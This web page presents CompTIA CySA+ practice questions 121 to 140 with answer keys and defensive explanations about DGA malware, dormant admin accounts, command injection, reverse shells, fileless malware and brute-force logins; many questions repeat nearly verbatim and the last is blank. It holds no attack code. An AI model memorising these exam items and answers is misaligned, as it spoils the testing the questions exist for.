CompTIA  CS0-003  CySA+ Exam  Dumps and Practice Test Questions Set 7 Q121-140

Visit here for our full CompTIA CS0-003 exam dumps and practice test questions.

Question 121

A SOC analyst notices several endpoints attempting to access a series of suspicious domains over high-numbered ports. DNS logs show frequent queries for pseudo-randomly generated domains. Which of the following BEST describes the threat?

A) Malware using a domain generation algorithm (DGA) for command-and-control
B) Standard software update traffic
C) Distributed denial-of-service (DDoS) attack
D) Misconfigured internal monitoring system

Answer A

Explanation:

A Malware using a domain generation algorithm (DGA) for command-and-control

The pattern of unusual outbound connections to unknown IP addresses over non-standard ports combined with high-frequency DNS queries to pseudo-randomly generated domains strongly indicates the presence of malware utilizing a domain generation algorithm (DGA). DGAs are a sophisticated technique used by malware to maintain communication with command-and-control (C2) infrastructure while evading traditional detection mechanisms like static blacklists.

DGAs work by algorithmically generating domain names at regular intervals, which the malware attempts to resolve and connect to. Even if some domains are blocked or taken down, others generated by the algorithm remain accessible, ensuring persistent C2 connectivity. The random or high-entropy nature of these domains is a clear indicator that the traffic is anomalous and likely malicious.

Detecting DGA activity requires a multi-layered approach. DNS logs should be analyzed for abnormal query patterns, such as high entropy in domain names, high query volumes, and frequent failures for domain resolution. Network traffic analysis complements this by identifying unusual outbound connections, especially to IP addresses or ports not typically used by legitimate applications. Endpoint telemetry and behavioral monitoring are essential to detect memory-resident malware attempting these connections, which often evade traditional signature-based antivirus solutions.

Mitigation strategies include isolating affected endpoints to prevent further compromise, blocking domains identified as part of DGA activity, and performing thorough malware eradication procedures. Forensic analysis should aim to identify the malware variant, determine the scope of compromise, and identify the attack vector. Reverse-engineering the DGA algorithm can allow analysts to predict future domain names, enabling preemptive blocking and disrupting attacker communications.

Threat intelligence feeds are invaluable in this context. They provide information on known malware families, associated DGA algorithms, and indicators of compromise (IOCs) that can accelerate detection and mitigation. Additionally, implementing defense-in-depth controls—such as endpoint detection and response (EDR), network segmentation, anomaly detection, and strict egress filtering—enhances the organization’s ability to detect and contain DGA-based malware campaigns effectively.

B Standard software update traffic

Legitimate software updates typically communicate with known servers over standard ports. Randomized DNS queries and connections to unknown IP addresses are inconsistent with normal update behavior. Indicators such as high entropy in domain names and unusual frequency of queries strongly differentiate malicious activity from routine software updates.

C Distributed denial-of-service (DDoS) attack

 DDoS attacks aim to overwhelm services, causing resource exhaustion and service disruption. The scenario described involves covert outbound communication and dynamic domain resolution rather than volumetric traffic intended to degrade service availability. DDoS characteristics differ significantly from C2 communication facilitated by DGAs.

D Misconfigured internal monitoring system

Misconfigurations may cause anomalous traffic patterns, but they rarely produce pseudo-random domain requests combined with outbound connections to unknown external IPs over high-numbered ports. The volume, frequency, and random nature of the DNS queries strongly suggest malicious activity rather than operational misconfiguration.

Question 122

 An audit reveals multiple service accounts with administrative privileges have not been accessed for over six months. Which of the following controls would MOST effectively mitigate the associated risk?

A) Implement automated account deprovisioning
B) Increase password complexity requirements for service accounts
C) Disable all external SSH access
D) Deploy full disk encryption on endpoints

Answer A

Explanation:

A Implement automated account deprovisioning

Dormant service accounts with administrative privileges pose a substantial security risk. Attackers often target these accounts to gain unauthorized access or maintain persistence within the network. Automated account deprovisioning is the most effective control because it systematically disables or removes accounts after a defined period of inactivity, ensuring compliance with least privilege principles.

Integration with identity governance and privileged access management (PAM) systems ensures that deprovisioning policies are applied consistently across the organization. Automated deprovisioning also provides audit trails necessary for compliance with regulations such as PCI DSS, HIPAA, and SOX. This approach minimizes human error associated with manual account reviews, which may overlook dormant accounts or fail to remove them in a timely manner.

Automation also complements other security controls, including multi-factor authentication (MFA), role-based access control (RBAC), and anomaly detection. By automatically removing or disabling inactive accounts, organizations reduce the attack surface and prevent potential exploitation of dormant accounts by malicious insiders or external attackers who may obtain credentials through phishing or credential-stuffing attacks.

Regular account audits, combined with automated deprovisioning, provide ongoing assurance that only active accounts retain administrative privileges. Organizations should implement periodic reviews and recertification processes to ensure adherence to least privilege principles. Additionally, monitoring for attempts to access deprovisioned accounts provides early warning of potential insider threats or compromised credentials.

B Increase password complexity requirements for service accounts

While stronger passwords reduce susceptibility to brute-force attacks, they do not address the risks associated with dormant accounts retaining administrative privileges. The account remains a valid attack vector regardless of password strength if it is inactive but enabled.

C Disable all external SSH access

Restricting external SSH reduces potential attack vectors but does not address risks posed by dormant accounts or internal misuse.

D Deploy full disk encryption on endpoints

Encryption protects data at rest but does not reduce risks associated with dormant administrative accounts that could be leveraged for unauthorized access or lateral movement.

Question 123

During a penetration test, testers exploit a web application vulnerability allowing OS-level command execution via unsanitized input. Which control would BEST prevent this type of attack?

A) Server-side input validation with parameterized commands
B) Enforce TLS encryption for all web traffic
C) Increase session timeout values
D) Add additional firewall rules at the perimeter

Answer A

Explanation:

A Server-side input validation with parameterized commands

  Command injection occurs when an application improperly processes user input, allowing execution of arbitrary operating system commands. Server-side input validation ensures that input data meets expected patterns, types, and lengths. Parameterized commands or prepared statements separate user input from executable code, preventing injection attacks.

Secure coding practices, including input validation, output encoding, and using secure frameworks, reduce vulnerabilities at the application layer. Static application security testing (SAST) and dynamic application security testing (DAST) help detect vulnerabilities during development. Web application firewalls (WAFs) provide additional protection by filtering requests that match known attack patterns.

Behavioral monitoring and logging of input validation failures and anomalous execution attempts facilitate early detection of attacks. Remediation includes updating vulnerable code, following secure coding standards, and training developers in best practices. Periodic penetration tests validate the effectiveness of these controls.

TLS encryption secures data in transit but does not prevent command injection. Session timeout management mitigates session hijacking, and firewall rules control traffic but cannot inspect application-level input. Input validation and parameterization provide the primary defense against command execution attacks.

Question 124

A SOC analyst detects that a server has been compromised, and a reverse shell has been established using stolen administrative credentials. Which control would MOST effectively prevent similar attacks in the future?

A) Implement privileged access management (PAM) with just-in-time (JIT) access
B) Increase password complexity for all accounts
C) Deploy signature-based antivirus on the server
D) Disable all remote access capabilities

Answer A

Explanation:

A Implement privileged access management (PAM) with just-in-time (JIT) access

PAM with JIT access minimizes the risk of credential misuse. JIT ensures administrative privileges are granted only when required and for limited periods, reducing the window of opportunity for attackers. PAM also provides session logging, monitoring, and auditing, allowing rapid detection of suspicious activities.

Integrating PAM with multi-factor authentication (MFA), endpoint detection and response (EDR), and SIEM solutions strengthens security posture. JIT enforces least privilege while allowing operational workflows to continue, ensuring business continuity. PAM also provides a complete audit trail for regulatory compliance.

Strong passwords reduce brute-force risks but cannot mitigate attacks using compromised credentials. Signature-based antivirus may detect known malware but is ineffective against reverse shells using legitimate tools. Disabling remote access can disrupt operations, whereas PAM with JIT provides secure access without operational disruption.

Question 125

A security analyst observes abnormal PowerShell execution on multiple endpoints. Scripts are obfuscated and communicate with unknown external IPs. Antivirus scans show no malicious files. Which threat does this BEST describe?

A) Fileless malware leveraging living-off-the-land techniques
B) Standard ransomware encrypting files
C) Phishing emails delivering malicious attachments
D) Distributed denial-of-service (DDoS) attack

Answer A

Explanation:

A Fileless malware leveraging living-off-the-land techniques

Fileless malware executes primarily in memory, leveraging legitimate system tools such as PowerShell, WMI, or Office macros. The scenario—obfuscated scripts communicating externally without detectable files—indicates living-off-the-land (LotL) techniques.

Detection requires behavioral monitoring, EDR telemetry, and memory analysis. Fileless malware evades signature-based antivirus because it leaves minimal disk artifacts. Indicators include unusual script execution, abnormal network communications, and deviations from baseline behaviors.

Mitigation involves isolating affected systems, terminating malicious processes, analyzing scripts, and remediating endpoints. Preventive measures include application whitelisting, least privilege enforcement, PowerShell logging, and execution policy restrictions. Threat intelligence integration helps block malicious domains and IPs. Defense-in-depth—combining monitoring, anomaly detection, user training, and incident response—is essential.

Ransomware, phishing, and DDoS do not match the described memory-resident, script-driven, obfuscated activity.

Question 126

A SOC analyst observes multiple endpoints communicating with external IP addresses over uncommon ports. DNS logs show high volumes of queries to pseudo-randomly generated domains. Which of the following BEST describes the threat?

A) Malware using a domain generation algorithm (DGA) for command-and-control
B) Standard software update traffic
C) Distributed denial-of-service (DDoS) attack
D) Misconfigured internal monitoring system

Answer A

Explanation:

A Malware using a domain generation algorithm (DGA) for command-and-control

The observed scenario strongly indicates the presence of malware using a domain generation algorithm (DGA) for command-and-control (C2) communications. DGAs are designed to generate a large number of pseudo-random domain names at specific intervals, enabling malware to connect to its C2 infrastructure while evading detection mechanisms such as static blacklists, firewalls, and intrusion detection systems.

Indicators of DGA activity include outbound connections to unusual IP addresses over non-standard ports, frequent DNS queries to high-entropy or random-looking domains, and persistent attempts to reach external networks from infected endpoints. Such activity contrasts sharply with normal network behavior, as legitimate applications and services typically communicate with known servers over standard ports and use predictable domain names.

Detecting DGA-based malware requires a multi-layered approach. DNS logs should be analyzed for anomalies, such as high-frequency queries, domains with randomized characters, or repeated failed resolutions. Behavioral analysis and endpoint telemetry can identify memory-resident malware or unauthorized process executions. Analysts may also deploy sandboxing to safely observe the behavior of suspicious scripts or binaries to determine the nature of the malware.

Mitigation involves isolating affected endpoints to prevent further compromise, blocking known malicious domains and IP addresses, and performing comprehensive malware eradication. Forensic investigation should aim to understand the scope of infection, identify the malware variant, determine the attack vector, and document indicators of compromise (IOCs). Reverse engineering the DGA algorithm can enable proactive defenses by predicting domains that malware might generate in the future and blocking them before they are used for C2 communications.

Threat intelligence is critical in identifying DGA-related threats. Integration with threat intelligence feeds allows organizations to identify known malware families, associated algorithms, and previously reported IOCs. Combining this intelligence with monitoring and alerting systems strengthens the organization’s ability to detect and respond to emerging threats.

Additionally, implementing defense-in-depth measures is essential. Network segmentation can prevent malware from moving laterally across critical systems. Endpoint detection and response (EDR) solutions allow monitoring for anomalous behavior on hosts. Strict egress filtering can prevent unauthorized outbound communications, and anomaly-based intrusion detection systems can identify unusual traffic patterns. User training and awareness programs also play a role in preventing initial infection vectors, such as phishing campaigns that may deliver malware.

B Standard software update traffic

Legitimate software updates communicate with known servers using standard ports and predictable domain names. Randomized DNS queries or communication with unusual external IP addresses are inconsistent with routine software update behavior. High-entropy domains and irregular query patterns are strong indicators of malicious activity rather than legitimate update processes.

C Distributed denial-of-service (DDoS) attack

DDoS attacks aim to overwhelm services to cause unavailability. They are characterized by volumetric traffic directed at a specific target. The scenario describes covert communication attempts and domain randomization rather than overwhelming service traffic, indicating malware communication rather than a DDoS attack.

D Misconfigured internal monitoring system

Misconfigurations may generate abnormal traffic, but rarely do they produce high-frequency queries to pseudo-random domains combined with outbound connections over uncommon ports. The observed behavior, including the randomness and persistence of queries, strongly points toward malicious activity rather than operational misconfiguration.

 

Question 127

An internal audit reveals multiple privileged service accounts that have not been used for over six months but retain administrative privileges. Which of the following controls would MOST effectively mitigate this risk?

A) Implement automated account deprovisioning
B) Increase password complexity requirements for service accounts
C) Disable all external SSH access
D) Deploy full disk encryption on endpoints

Answer A

Explanation:

A Implement automated account deprovisioning

Dormant privileged accounts pose significant security risks. They may be targeted by attackers seeking to gain unauthorized access or maintain persistence within the network. Automated account deprovisioning mitigates this risk by systematically disabling or removing accounts after a defined period of inactivity. This aligns with the principle of least privilege, ensuring only active accounts retain administrative access.

Automation provides consistency and reliability in account management. Manual deprovisioning is prone to human error and may fail to identify dormant accounts in time. By integrating automated deprovisioning with identity governance and privileged access management (PAM) systems, organizations ensure consistent policy enforcement, auditing, and compliance with regulatory standards such as PCI DSS, HIPAA, and SOX.

Automated deprovisioning complements other controls, including multi-factor authentication (MFA), role-based access control (RBAC), and anomaly detection systems. By removing inactive accounts, the organization reduces the attack surface, preventing both internal misuse and external exploitation of dormant credentials. Additionally, continuous monitoring of access attempts, even for deprovisioned accounts, can provide early warning of potential insider threats or compromised credentials.

Periodic recertification and audit processes further reinforce the security posture by ensuring that only necessary accounts maintain elevated privileges. Organizations should also implement alerting for unusual access patterns, such as attempts to log into previously inactive accounts or high-frequency authentication failures.

B Increase password complexity requirements for service accounts

While strong passwords help resist brute-force attacks, they do not eliminate the risks associated with dormant administrative accounts. Even highly complex passwords do not prevent an attacker from leveraging inactive accounts if they remain enabled.

C Disable all external SSH access

Restricting SSH access reduces certain attack vectors but does not mitigate the risk posed by internally compromised or dormant accounts.

D Deploy full disk encryption on endpoints

Encryption protects data at rest but does not prevent misuse of dormant administrative accounts. The attack surface remains if accounts are left active.

Question 128

During a penetration test, testers exploit a web application vulnerability allowing OS-level command execution via unsanitized input fields. Which control would BEST prevent this type of attack?

A) Server-side input validation with parameterized commands
B) Enforce TLS encryption for all web traffic
C) Increase session timeout values
D) Add additional firewall rules at the perimeter

Answer A

Explanation:

A Server-side input validation with parameterized commands

Command injection vulnerabilities arise when applications improperly process user input, allowing malicious commands to be executed on the host operating system. Server-side input validation ensures that all input data adheres to expected formats, types, and lengths, preventing malicious commands from executing.

Parameterized commands or prepared statements isolate user input from executable instructions, neutralizing potential injection attacks. Secure coding practices, including input validation, output encoding, and adherence to secure frameworks, significantly reduce the risk of command injection.

Static application security testing (SAST) and dynamic application security testing (DAST) identify vulnerabilities during development, allowing remediation before deployment. Web application firewalls (WAFs) provide an additional layer of defense by filtering and blocking malicious requests that match known attack patterns.

Monitoring anomalous input behavior and logging input validation failures are critical for early detection of attempted command injection attacks. Organizations should establish secure coding standards, perform code reviews, and conduct regular penetration tests to validate the effectiveness of these controls.

TLS encryption ensures secure communication but does not prevent command injection. Session timeout management mitigates session hijacking but is irrelevant to command injection. Firewalls control network traffic but cannot inspect application-layer input effectively; therefore, parameterized commands and server-side input validation remain the primary defense.

B Enforce TLS encryption for all web traffic

TLS encrypts communication but does not mitigate application-layer vulnerabilities. It ensures confidentiality and integrity of data in transit but cannot prevent command execution via unsanitized input.

C Increase session timeout values

Session timeout addresses session hijacking and unauthorized session reuse but does not mitigate input-based command injection.

D Add additional firewall rules at the perimeter

Firewalls provide perimeter protection and traffic filtering but cannot inspect application-layer input, leaving the vulnerability unmitigated.

Question 129

A SOC analyst detects that a server has been compromised, and a reverse shell has been established using stolen administrative credentials. Which control would MOST effectively prevent similar attacks in the future?

A) Implement privileged access management (PAM) with just-in-time (JIT) access
B) Increase password complexity for all accounts
C) Deploy signature-based antivirus on the server
D) Disable all remote access capabilities

Answer A

Explanation:

A Implement privileged access management (PAM) with just-in-time (JIT) access

PAM with JIT access ensures that administrative privileges are granted only when needed and for a limited duration, reducing the attack window. This minimizes the potential impact of stolen credentials by preventing attackers from maintaining persistent access.

PAM solutions provide detailed session logging, monitoring, and auditing, enabling rapid detection of anomalous activity. Integration with multi-factor authentication (MFA), endpoint detection and response (EDR), and SIEM systems enhances visibility and security enforcement. JIT access enforces least privilege while maintaining operational workflows, allowing legitimate administrative tasks to proceed without unnecessary risk exposure.

Strong passwords alone cannot prevent attackers from using already compromised credentials. Signature-based antivirus may detect known malware but is ineffective against reverse shells using legitimate system tools. Disabling remote access entirely may disrupt business operations, whereas PAM with JIT access offers controlled, secure access without operational interruption.

Question 130

A security analyst observes abnormal PowerShell execution on multiple endpoints. Scripts are obfuscated and communicate with unknown external IPs. Antivirus scans show no malicious files. Which threat does this BEST describe?

A) Fileless malware leveraging living-off-the-land techniques
B) Standard ransomware encrypting files
C) Phishing emails delivering malicious attachments
D) Distributed denial-of-service (DDoS) attack

Answer A

Explanation:

A Fileless malware leveraging living-off-the-land techniques

Fileless malware operates primarily in memory and leverages legitimate system tools, such as PowerShell, WMI, or Office macros, to perform malicious activities. Obfuscated scripts communicating with external IPs without creating files on disk indicate living-off-the-land (LotL) techniques.

Detection requires behavioral monitoring, endpoint detection and response (EDR), and memory analysis. Signature-based antivirus is largely ineffective because the malware does not leave traditional files on disk. Indicators of compromise include unusual script execution, network anomalies, and deviations from baseline behaviors.

Mitigation strategies include isolating affected endpoints, terminating malicious processes, analyzing scripts for malicious behavior, and remediating compromised systems. Preventive measures include application whitelisting, enforcing least privilege, PowerShell logging, script block logging, transcription, and execution policy restrictions. Threat intelligence helps identify and block malicious domains or IPs.

Living-off-the-land malware evades traditional defenses by exploiting legitimate tools. Defense-in-depth strategies combining anomaly detection, continuous monitoring, user awareness training, and structured incident response are essential to detect and remediate these threats effectively.

Ransomware, phishing, and DDoS attacks do not match the observed memory-resident, script-based, obfuscated activity.

Question 131

 A SOC analyst observes a large number of failed login attempts across multiple systems, originating from several external IP addresses. Some attempts use different username variations for the same accounts. Which of the following BEST describes the threat?

A) Brute-force attack targeting user credentials
B) Malware exfiltrating sensitive files
C) Distributed denial-of-service (DDoS) attack
D) Man-in-the-middle (MitM) attack

Answer A

Explanation:

A Brute-force attack targeting user credential

The described scenario strongly indicates a brute-force attack, a type of attack in which an adversary systematically attempts numerous username and password combinations to gain unauthorized access. Multiple failed login attempts from external IPs across different accounts, especially when attempting variations of known usernames, are classic indicators of this attack type.

Brute-force attacks can be conducted manually but are typically automated using specialized tools and scripts, which can attempt hundreds or thousands of credential combinations per minute. These attacks target weak passwords, reused passwords across systems, and accounts with insufficient security policies. Attackers often employ distributed botnets to rotate IP addresses and avoid detection, making tracking and blocking more difficult.

Mitigation requires a layered approach. Account lockout policies prevent repeated login attempts by temporarily disabling accounts after a threshold of failures. Multi-factor authentication (MFA) ensures that even if a password is compromised, an additional authentication factor is required, significantly reducing the likelihood of unauthorized access. Monitoring failed login attempts and correlating them with threat intelligence feeds allows early detection of coordinated brute-force campaigns.

Rate-limiting authentication attempts at the application or network level can slow down automated attacks. Additionally, implementing IP blacklists or geolocation-based restrictions can block known malicious sources, although sophisticated attackers may use proxy networks to bypass these measures. Regular audits of account activity, enforcement of strong password policies, and user education on password hygiene further reduce susceptibility.

Detection relies on aggregating logs from multiple systems to identify patterns of repeated failed login attempts. Security information and event management (SIEM) solutions can correlate events and generate alerts for potential brute-force activity. Advanced analytics may include anomaly detection models to identify unusual access patterns indicative of credential-based attacks.

B Malware exfiltrating sensitive files

Malware exfiltration involves the unauthorized transfer of data to an external destination, typically using covert channels. While exfiltration may involve anomalous network traffic, it does not generally produce repeated login failures with multiple username variations across multiple systems.

C Distributed denial-of-service (DDoS) attack

 DDoS attacks aim to disrupt availability by overwhelming systems with traffic. They do not involve systematic login attempts or credential testing.

D Man-in-the-middle (MitM) attack

MitM attacks intercept communications between parties, potentially capturing credentials or data. However, MitM attacks typically do not manifest as repeated failed login attempts across multiple systems. The pattern described is indicative of credential brute-forcing rather than interception.

Effective response includes isolating affected systems, resetting potentially compromised accounts, reviewing authentication logs, and enforcing multifactor authentication. Continuous monitoring, combined with preventive measures, minimizes the risk of successful credential compromise.

Question 132

An analyst detects a spike in network traffic to multiple external IP addresses over high-numbered ports. DNS logs reveal connections to randomly generated domains. Which of the following BEST describes this threat?

A) Malware using a domain generation algorithm (DGA) for command-and-control
B) Standard software update traffic
C) Distributed denial-of-service (DDoS) attack
D) Misconfigured internal monitoring system

Answer A

Explanation:

A Malware using a domain generation algorithm (DGA) for command-and-control

The behavior described—high-frequency connections to external IP addresses over unusual ports, combined with DNS queries to randomized domains—is a hallmark of malware employing a domain generation algorithm (DGA). DGAs allow malware to maintain resilient communication channels with C2 servers while evading detection through static blacklists.

DGAs generate pseudo-random domain names on a scheduled basis, enabling malware to attempt connections to domains that are unlikely to be blocked initially. Even if some domains are taken down or blocked, others remain accessible, ensuring persistence. Detection requires correlating network and DNS logs for abnormal traffic patterns, including high query volume, random domain names, and connection attempts to non-standard ports.

Mitigation involves isolating affected hosts, blocking known malicious domains and IPs, and removing malware. Reverse-engineering DGAs can allow predictive blocking of future domains. Threat intelligence integration supports identification of malware families, known algorithms, and associated indicators of compromise (IOCs).

Behavioral monitoring, endpoint detection and response (EDR), and anomaly detection are critical for identifying fileless or memory-resident malware that does not leave traditional artifacts. Implementing network segmentation, strict egress filtering, and application whitelisting enhances defense-in-depth. User training reduces susceptibility to phishing attacks, which are a common initial infection vector.

B Standard software update traffic

Legitimate software updates communicate with known servers over standard ports and predictable domain names. Randomized domains and high-entropy DNS queries are inconsistent with normal update behavior.

C Distributed denial-of-service (DDoS) attack

DDoS attacks focus on overwhelming systems to disrupt availability, not establishing covert communication with randomized external domains.

D Misconfigured internal monitoring system

 Misconfigurations can cause abnormal traffic but rarely produce high-frequency DNS queries to pseudo-random domains combined with connections over non-standard ports.

Question 133

A security audit identifies several privileged accounts that have not been used in over six months. Which control would MOST effectively mitigate this risk?

A) Implement automated account deprovisioning
B) Increase password complexity for service accounts
C) Disable all external SSH access
D) Deploy full disk encryption on endpoints

Answer A

Explanation:

A Implement automated account deprovisioning

Dormant accounts with administrative privileges present a major security risk. Attackers may exploit inactive accounts for unauthorized access or persistence. Automated account deprovisioning systematically disables or removes accounts after inactivity, enforcing least privilege principles.

Integration with identity governance and privileged access management (PAM) ensures consistent policy enforcement, auditing, and regulatory compliance (PCI DSS, HIPAA, SOX). Automated deprovisioning reduces human error associated with manual reviews and improves operational efficiency.

Complementary controls include MFA, RBAC, anomaly detection, and periodic privilege recertification. Monitoring access attempts on disabled accounts provides early indicators of insider threats or credential compromise. Automated deprovisioning ensures inactive accounts are consistently removed, reducing the attack surface and improving security posture.

B Increase password complexity for service accounts

Strong passwords reduce brute-force attack risk but do not mitigate risks from dormant accounts.

C Disable all external SSH access

SSH restrictions limit certain attack vectors but do not address dormant accounts.

D Deploy full disk encryption on endpoints

Encryption protects data at rest but does not mitigate account misuse.

Question 134

During a penetration test, testers exploit unsanitized web input fields, enabling OS-level command execution. Which control BEST prevents this attack?

A) Server-side input validation with parameterized commands
B) Enforce TLS encryption for web traffic
C) Increase session timeout values
D) Add additional firewall rules at the perimeter

Answer A

Explanation:

A Server-side input validation with parameterized commands

Command injection occurs when applications fail to properly validate input, allowing malicious commands to execute. Server-side validation enforces expected input patterns and types, preventing arbitrary code execution. Parameterized commands or prepared statements separate user input from executable instructions, effectively neutralizing injection attacks.

Secure coding practices, including input validation, output encoding, and adherence to secure frameworks, reduce vulnerabilities. SAST and DAST identify issues during development, while web application firewalls (WAFs) provide an additional layer of protection. Behavioral monitoring and logging of anomalous input improve early detection.

TLS encrypts communication but does not prevent injection. Session timeout mitigates hijacking but is irrelevant to injection. Firewall rules control network traffic but cannot inspect application input effectively. Input validation remains the primary defense against command injection.

Question 135

A SOC analyst detects obfuscated PowerShell scripts executing on multiple endpoints and communicating with unknown external IPs. Antivirus scans show no malicious files. Which threat BEST describes this activity?

A) Fileless malware leveraging living-off-the-land techniques
B) Standard ransomware encrypting files
C) Phishing emails delivering malicious attachments
D) Distributed denial-of-service (DDoS) attack

Answer A

Explanation:

A Fileless malware leveraging living-off-the-land techniques

Fileless malware executes primarily in memory, using legitimate system tools such as PowerShell, WMI, or macros to perform malicious actions. Obfuscated scripts communicating externally without creating files on disk indicate living-off-the-land (LotL) techniques.

Detection requires behavioral monitoring, endpoint detection and response (EDR), and memory analysis. Signature-based antivirus is ineffective against fileless malware. Indicators include abnormal script execution, network anomalies, and deviations from baseline behavior.

Mitigation involves isolating endpoints, terminating malicious processes, analyzing scripts, and remediating systems. Preventive measures include application whitelisting, least privilege, PowerShell logging, script block logging, execution policies, and threat intelligence integration to block malicious domains.

Living-off-the-land malware evades traditional defenses, necessitating a defense-in-depth strategy that includes monitoring, anomaly detection, user training, and structured incident response. Ransomware, phishing, and DDoS do not match the observed memory-resident, obfuscated, script-driven activity.

Question 136

A SOC analyst identifies a sudden increase in failed login attempts across multiple endpoints. These attempts use common username patterns and originate from a range of external IP addresses. Which of the following BEST describes the threat?

A) Brute-force attack targeting user credentials
B) Fileless malware using living-off-the-land techniques
C) Distributed denial-of-service (DDoS) attack
D) Phishing attack delivering malicious attachments

Answer A

Explanation:

A Brute-force attack targeting user credentials

The pattern of repeated failed login attempts across multiple endpoints and accounts, particularly using common username patterns, strongly indicates a brute-force attack. Brute-force attacks involve systematically attempting a large number of username-password combinations to gain unauthorized access to systems or accounts. These attacks are often automated using scripts or botnets, enabling attackers to attempt thousands of login attempts in a short period of time.

Brute-force attacks can target both individual accounts and multiple accounts simultaneously. Attackers often rotate IP addresses to evade detection, leveraging botnets or proxy networks. High-frequency failed login attempts, particularly when originating from geographically diverse IPs, are a clear indicator of automated credential attacks rather than user error.

Detection and mitigation require multiple layers of controls. Account lockout policies prevent continuous attempts by temporarily disabling accounts after a set number of failed login attempts. Implementing multi-factor authentication (MFA) adds an additional layer of security, requiring a secondary authentication factor, such as a time-based one-time password (TOTP) or biometric factor, making it extremely difficult for attackers to gain access even if credentials are compromised.

Monitoring and correlating login attempts through SIEM solutions or log aggregation tools allows SOC analysts to detect patterns indicative of brute-force campaigns. Advanced analytics and anomaly detection can identify attempts from unusual geolocations or unusual timeframes. Rate limiting on authentication endpoints slows down attack attempts, reducing the effectiveness of automated scripts.

Additional preventive measures include ensuring strong password policies are enforced, training users on password hygiene, and conducting periodic audits to identify accounts with weak or default passwords. Threat intelligence feeds can provide information about known credential attack campaigns and attacker IP addresses, enabling proactive blocking and monitoring.

B Fileless malware using living-off-the-land technique

 Fileless malware operates in memory and leverages legitimate tools like PowerShell or WMI. While it may involve anomalous execution patterns, it does not produce repeated failed login attempts.

C Distributed denial-of-service (DDoS) attack

DDoS attacks focus on overwhelming resources to disrupt availability. They do not involve credential testing or systematic login attempts.

D Phishing attack delivering malicious attachments

 Phishing attacks may deliver malware or steal credentials, but they typically rely on user interaction rather than automated login attempts across multiple endpoints.

Effective response includes isolating potentially affected accounts, monitoring authentication logs, enforcing MFA, and blocking suspicious IPs. Continuous monitoring and layered defense strategies minimize the risk of successful credential compromise.

Question 137

An analyst detects high volumes of DNS queries to pseudo-randomly generated domains, paired with outbound traffic to unknown IP addresses over non-standard ports. Which of the following BEST describes this activity?

A) Malware using a domain generation algorithm (DGA) for command-and-control
B) Routine software update traffic
C) Distributed denial-of-service (DDoS) attack
D) Misconfigured internal monitoring system

Answer A

Explanation:

A Malware using a domain generation algorithm (DGA) for command-and-control

 The described pattern—high-frequency DNS queries to pseudo-random domains combined with outbound connections over unusual ports—is a hallmark of malware utilizing a domain generation algorithm (DGA). DGAs allow malware to maintain resilient communication channels with its command-and-control (C2) infrastructure while evading static detection measures such as blacklists or signature-based detection.

DGAs work by algorithmically generating a large set of domain names over time, enabling the malware to attempt connections to C2 servers even if some domains are blocked. These dynamically generated domains appear random, making detection based on static signatures ineffective. Malware using DGAs is often associated with sophisticated threat actors, including advanced persistent threat (APT) groups, as it enables long-term persistence and stealthy operations.

Detecting DGA activity involves correlating DNS logs with network traffic. Indicators include high entropy in queried domain names, unusual query volumes, repeated failed resolutions, and connections to non-standard ports. Behavioral analysis and endpoint telemetry can identify malicious processes generating DGA activity in memory. Advanced detection may use machine learning models to identify high-entropy domain queries and anomalous traffic patterns.

Mitigation involves isolating affected endpoints to prevent further compromise, blocking known malicious domains and IPs, and performing thorough malware eradication procedures. Reverse engineering the DGA algorithm allows analysts to predict future domain names and preemptively block them, disrupting C2 communication. Integration of threat intelligence feeds helps identify known DGA-based malware variants and associated indicators of compromise (IOCs).

Defense-in-depth is critical, combining endpoint detection and response (EDR), network monitoring, anomaly detection, strict egress filtering, and application whitelisting. Organizations should also implement user awareness training to prevent initial infection vectors such as phishing emails, which often deliver DGA-enabled malware.

B Routine software update traffic

Software updates communicate with known servers over standard ports and predictable domains. Randomized DNS queries and high-entropy domain names are inconsistent with normal update behavior.

C Distributed denial-of-service (DDoS) attack

DDoS attacks overwhelm systems to degrade service availability. They do not involve covert communication with randomly generated domains or external C2 servers.

D Misconfigured internal monitoring system

Misconfigurations can cause abnormal traffic but rarely result in high-frequency queries to pseudo-random domains combined with outbound connections over unusual ports.

Question 138

A security audit discovers several privileged service accounts that have not been used for over six months but still retain administrative privileges. Which of the following controls would MOST effectively reduce associated risks?

A) Implement automated account deprovisioning
B) Increase password complexity requirements for service accounts
C) Disable all external SSH access
D) Deploy full disk encryption on endpoints

Answer A

Explanation:

A Implement automated account deprovisioning

Dormant privileged accounts present a significant security risk. Attackers may exploit these accounts to gain unauthorized access or maintain persistence in the environment. Automated account deprovisioning is the most effective control because it systematically disables or removes accounts after a predefined period of inactivity. This ensures that administrative privileges are granted only when required, enforcing the principle of least privilege.

Automated deprovisioning integrated with identity governance and privileged access management (PAM) systems ensures consistent enforcement, auditability, and regulatory compliance (e.g., PCI DSS, HIPAA, SOX). Manual deprovisioning is error-prone, and dormant accounts may be overlooked, leaving potential attack vectors open.

Complementary controls include implementing multi-factor authentication (MFA), role-based access control (RBAC), periodic privilege recertification, and monitoring access attempts for anomalies. By removing or disabling inactive accounts, the organization significantly reduces the attack surface and prevents misuse of dormant credentials. Continuous monitoring of disabled accounts also provides early detection of potential insider threats or attempts to leverage compromised credentials.

B Increase password complexity requirements for service accounts

Strong passwords help resist brute-force attacks but do not mitigate the risk of dormant administrative accounts. The risk remains if the account is still active but unused.

C Disable all external SSH access

 Restricting SSH access reduces exposure from external attacks but does not address internal threats or dormant accounts.

D Deploy full disk encryption on endpoints

Full disk encryption protects data at rest but does not prevent misuse of administrative accounts.

 

Question 139

During a penetration test, testers exploit unsanitized web input fields, allowing OS-level command execution. Which of the following controls BEST mitigates this type of vulnerability?

A) Server-side input validation with parameterized commands
B) Enforce TLS encryption for all web traffic
C) Increase session timeout values
D) Add additional firewall rules at the perimeter

Answer A

Explanation:

A Server-side input validation with parameterized commands

Command injection vulnerabilities occur when applications fail to properly validate input, allowing attackers to execute arbitrary operating system commands. Server-side input validation ensures that all input meets expected types, patterns, and lengths. Parameterized commands or prepared statements separate input data from executable commands, effectively preventing injection attacks.

Secure coding practices, including input validation, output encoding, and secure frameworks, reduce application-layer vulnerabilities. Static application security testing (SAST) and dynamic application security testing (DAST) identify injection vulnerabilities during development. Web application firewalls (WAFs) provide an additional layer of protection by blocking requests that match known attack signatures.

Monitoring and logging anomalous input attempts enable early detection. Remediation includes secure coding, code reviews, penetration testing, and developer training. While TLS encrypts communication, it does not prevent injection. Session timeouts protect sessions but do not mitigate injection. Firewalls control network traffic but cannot inspect application-level input. Server-side validation with parameterized commands remains the primary mitigation.

Question 140

